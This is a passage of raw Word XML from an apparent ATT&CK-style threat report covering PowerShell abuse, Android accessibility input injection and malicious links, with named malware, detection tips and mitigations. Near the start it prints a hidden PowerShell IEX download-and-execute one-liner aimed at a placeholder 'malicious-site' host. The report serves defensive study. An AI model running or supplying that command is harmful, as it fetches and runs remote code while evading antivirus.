      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString</w:t>
      </w:r>
      <w:r w:rsidR="00D4128B" w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>('hxxp://malicious-site/payload')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1494"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This command downloads and runs a remote script without writing to disk, evading signature-based AV.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1494"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APT41 leveraged PowerShell to deploy malware families like WINTERLOVE by injecting into iexplore.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Process Injection via PowerShell-Based Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries inject malicious code into legitimate processes (e.g., explorer.exe, svchost.exe) using PowerShell frameworks like PowerSploit or Empire. This masks execution under trusted processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FIN7 used Invoke-PSInject from PowerSploit to inject Cobalt Strike beacons into Rundll32.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sandworm Team (during the 2022 Ukraine power attack) employed PowerShell to spread TANKTRAP, a wiper, via Group Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detection Insights:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Monitor for powershell.exe with suspicious flags (-EncodedCommand, -WindowStyle Hidden).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00D4128B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analyze process ancestry (e.g., PowerShell spawned by Office apps)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4128B" w:rsidRPr="00D4128B" w:rsidRDefault="00D4128B" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2) Technique: Input Injection (T1516)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Primarily targeting Android, adversaries abuse accessibility APIs to programmatically inject UI interactions (e.g., clicks, text input). This simulates user actions to grant permissions, steal data, or bypass multi-factor authentication (MFA) 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRDefault="00B52D87" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UI Interaction Abuse for Permission Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Malicious apps use accessibility services to auto-click "Allow" on system prompts, granting themselves permissions (e.g., SMS access, device admin) without user consent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cerberus injected clicks to become the default SMS handler and prevent uninstallation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SharkBot mimicked touch inputs to approve bank transfers and disable security apps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Global Action Injection to Bypass Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries trigger system-level actions (e.g., GLOBAL_ACTION_BACK) to close security apps or settings screens. This disrupts user attempts to revoke permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gustuff injected GLOBAL_ACTION_BACK to terminate antivirus apps when detected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BRATA used accessibility services to interact with banking apps and steal credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4128B" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict accessibility services via MDM policies </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(e.g., DevicePolicyManager.setPermittedAccessibilityServices).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Educate users to scrutinize apps requesting accessibility access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3) Technique: User Execution → Malicious Link (T1204.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries trick users into clicking malicious links (e.g., in phishing emails) to download/execute payloads. This often follows Spearphishing Link and leads to exploitation of client-side vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52D87" w:rsidRDefault="00B52D87" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00357590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strategic Website Compromise with Geo-Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00D4128B" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries compromise legitimate sites frequented by targets (e.g., industry forums) and inject scripts that deliver exploits based on visitor profiles (e.g., IP ranges, browser versions).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00357590" w:rsidRPr="00B52D87" w:rsidRDefault="00357590" w:rsidP="00B52D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52D87">
        <w:rPr>
